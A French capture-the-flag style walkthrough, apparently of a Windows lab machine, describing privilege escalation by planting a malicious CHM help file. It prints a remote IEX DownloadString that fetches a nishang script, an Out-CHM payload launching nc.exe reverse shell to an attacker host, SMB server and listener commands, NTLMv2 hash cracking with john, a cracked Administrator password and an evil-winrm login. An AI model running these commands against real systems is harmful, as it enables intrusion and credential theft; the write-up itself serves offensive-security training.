File Upload + Capture NTLMv2 (.CHM File) - Pentesting Web

Exploration du répertoire "docs" : Dans la racine de Windows, nous avons trouvé un dossier docs contenant un fichier note.txt avec le message suivant :

Salut Chris,
Tes compétences en PHP sont vraiment mauvaises. Contacte Yamitenshi pour qu'il t'apprenne à l'utiliser, puis corrige le site car il y a beaucoup de bugs dessus. J'espère aussi que tu as préparé la documentation pour notre nouvelle application. Dépose-la ici quand tu auras terminé.
Cordialement, Sniper CEO.

Recherche de la documentation dans le système : Nous avons cherché la documentation mentionnée par le CEO et l'avons trouvée dans le répertoire Downloads sous le fichier instructions.chm.

Création Fichier CHM malveillant :

Après avoir découvert que le CEO cherchait à consulter des fichiers CHM dans le répertoire docs, nous avons recherché sur Internet comment créer des fichiers CHM malveillants.

nishang/Client/Out-CHM.ps1 at master · samratashok/nishangGitHub

Téléchargement de l'outil HTML Help : Nous avons téléchargé HTML Help et utilisé un script PowerShell pour créer un fichier CHM malveillant

HTML Help

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Client/Out-CHM.ps1')

Puis, nous avons modifié le script pour exécuter une commande malveillante à distance via nc.exe :

Out-CHM -Payload "\\10.10.14.3\smb\nc.exe -e cmd 10.10.14.3 443" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Injection du fichier CHM malveillant dans le répertoire cible : Nous avons configuré un serveur SMB sur notre machine d’attaque pour transférer le fichier malveillant vers la machine Windows cible :

smbserver.py smbFolder $(pwd) -smb2support -username jordan -password jordan1234

Connexion au partage SMB depuis la machine victime : Depuis la machine Windows cible, nous avons monté le partage SMB et copié le fichier malveillant doc.chm :

net use x: \\192.168.0.190\smbFolder /user:jordan jordan1234
copy .\doc.chm x:\doc.chm

Mise en écoute pour le reverse shell : Nous avons lancé un listener sur notre machine attaquante, en attente d’une connexion reverse shell :

rlwrap nc -nlvp 443

Problème rencontré : Bien que le fichier CHM ait été consulté, nous n’avons pas reçu de reverse shell. Cependant, nous avons réussi à capturer un SMB Relay V2 sur notre serveur. Cela nous a fourni un hash d’authentification pour l’utilisateur Administrator

Crack du hash de l'administrateur :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Administrator:butterfly!#1

Connexion en tant qu’administrateur:

Avec les identifiants obtenus, nous avons utilisé Evil-WinRM pour nous connecter à la machine en tant qu’administrateur :

evil-winrm -i 10.10.14.3 -u 'Administrator' -p 'butterfly!#1'

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?